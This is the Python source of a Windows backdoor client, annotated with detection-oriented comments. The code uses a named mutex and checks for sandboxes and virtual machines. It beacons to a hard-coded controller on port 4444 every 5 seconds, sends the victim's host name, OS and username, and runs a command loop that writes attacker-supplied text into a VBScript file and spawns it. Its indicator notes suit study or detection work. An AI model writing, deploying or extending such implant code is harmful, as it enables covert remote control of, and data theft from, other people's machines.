backdoor_client.py
# Install the required Python packages before running this code:
# python -m pip install pywin32 pyscreeze
import socket
import os
import sys
import platform
import time
import ctypes
import subprocess
import threading
import wmi
import win32api
import winerror
import win32event
import win32crypt
from winreg import *
# Controller endpoint, hard-coded as literals: a private (RFC 1918) IPv4 address
# and TCP port 4444. Because both are static in the file they can be matched in
# network telemetry and in static scans of the script.
strHost, intPort = "192.168.0.98", 4444
# Absolute path of the running script. Assigned here; not read again anywhere
# in this listing.
strPath = os.path.realpath(sys.argv[0])
# Per-user %APPDATA% directory. messageBox() drops its script file under it.
TMP = os.environ['APPDATA']
# Maximum number of bytes requested per recv() call in the command loop.
intBuff = 1024

# Single-instance guard. The named mutex "PA_mutex_xp4" is created on every
# launch, which makes the name a host-based indicator: its presence in a
# process's handle table identifies a running copy.
mutex = win32event.CreateMutex(None, 1, "PA_mutex_xp4")
if winerror.ERROR_ALREADY_EXISTS == win32api.GetLastError():
    # Another copy already holds the mutex: drop our reference and quit quietly.
    mutex = None
    sys.exit(0)
def detectSandboxie():
    """Return a tag saying whether Sandboxie's DLL can be loaded.

    Tries to load ``SbieDll.dll`` through ``ctypes.windll``. Returns
    ``" (Sandboxie) "`` when the load succeeds and ``""`` on any failure.

    The tag is only concatenated into the check-in string built by
    ``server_connect()``; nothing in this listing branches on it, so the
    script reports the sandbox rather than changing behaviour inside it.
    """
    try:
        ctypes.windll.LoadLibrary("SbieDll.dll")
    except:  # bare on purpose: every failure, of any kind, means "not detected"
        return ""
    else:
        return " (Sandboxie) "
def detectVM():
    """Return a tag saying whether a disk drive caption looks virtual.

    Queries WMI for ``Win32_DiskDrive`` and lower-cases each drive's
    ``Caption``. Returns ``" (Virtual Machine) "`` at the first caption that
    contains ``"vbox"`` or ``"virtual"``, otherwise ``""``.

    For analysts: this is a string match on one WMI property only, and the
    result is reported in the check-in string, not acted on in this listing.
    """
    markers = ("vbox", "virtual")
    for objDiskDrive in wmi.WMI().query("Select * from Win32_DiskDrive"):
        caption = objDiskDrive.Caption.lower()
        if any(marker in caption for marker in markers):
            return " (Virtual Machine) "
    return ""
def server_connect():
    """Connect to the hard-coded endpoint and send one check-in string.

    Rebinds the module-level ``obj_socket``. A new socket is created on every
    attempt and a failed attempt is followed by a 5-second sleep, so an
    unreachable endpoint shows up as outbound connection attempts to
    ``strHost:intPort`` spaced 5 seconds apart plus the connect time.

    After connecting, a cleartext string is sent containing the host name, OS
    name and release, the sandbox/VM tags and the ``USERNAME`` environment
    variable. It is unencrypted, so a network sensor can match on its layout.
    """
    global obj_socket

    connected = False
    while not connected:
        try:
            obj_socket = socket.socket()
            obj_socket.connect((strHost, intPort))
            connected = True
        except socket.error:
            time.sleep(5)  # wait 5 seconds, then try again

    # Pieces are evaluated left to right, in the same order as the original
    # concatenation; the quote/comma separators are reproduced exactly.
    info_parts = [
        socket.gethostname(),
        "',",
        platform.system(),
        " ",
        platform.release(),
        detectSandboxie(),
        detectVM(),
        "', ",
        os.environ["USERNAME"],
    ]
    str_user_info = "".join(info_parts)
    send(str_user_info.encode())
def decode_utf8(data):
    """Decode *data* (bytes read from the socket) as UTF-8 and return the text."""
    text = data.decode("utf-8")
    return text
def recv(buffer):
    """Read up to *buffer* bytes from the module-level ``obj_socket``.

    Returns whatever ``socket.recv`` returns, including the empty bytes object
    that signals the peer has closed the connection.
    """
    chunk = obj_socket.recv(buffer)
    return chunk
def send(data):
    """Write *data* to the module-level ``obj_socket`` with a single ``send``.

    Returns the value of ``socket.send`` (the number of bytes accepted), which
    may be fewer than ``len(data)``.
    """
    sent = obj_socket.send(data)
    return sent
# Initial check-in at start-up. server_connect() retries every 5 seconds until
# the TCP connection succeeds, so nothing below this line runs before then.
server_connect()
def messageBox(msg):
    """Write *msg* into a VBScript file under %APPDATA% and spawn a process on it.

    Observable artefacts, useful for detection and triage:

    * a file named ``m.vbs`` is created or overwritten in the user's
      ``%APPDATA%`` directory on every call;
    * *msg* is the text that followed ``msg`` in data read from the socket and
      is written into the script unmodified, so the file's contents (and hash)
      vary per command -- key on the path and process lineage, not the hash;
    * the child is started with ``shell=True``, so process-creation logs show
      the command interpreter as a child of the Python process.

    The command name is reproduced exactly as it appears in the original file.
    """
    script_path = TMP + "/m.vbs"
    with open(script_path, "w") as objVBS:
        objVBS.write("MsgBox " + msg + " Message")
    subprocess.Popen(["csript", script_path], shell=True)
# Command loop. Reads up to intBuff bytes, decodes them as UTF-8 and compares
# the text with two commands:
#   "exit"    -> close the socket and terminate the process
#   "msg..."  -> pass everything after the 4th character to messageBox()
# Commands arrive as cleartext with no authentication or integrity check visible
# in this listing, so the protocol can be read directly from a packet capture.
# An empty read (peer closed the connection) matches neither command and raises
# no socket error, so the inner loop simply polls again.
while True:
    try:
        while True:
            str_data = decode_utf8(recv(intBuff))
            if str_data == "exit":
                obj_socket.close()
                sys.exit(0)
            if str_data.startswith("msg"):
                messageBox(str_data[4:])
    except socket.error:
        # Connection error: discard the socket and go back to the 5-second
        # reconnect cycle in server_connect(), which sends a fresh check-in.
        obj_socket.close()
        del obj_socket
        server_connect()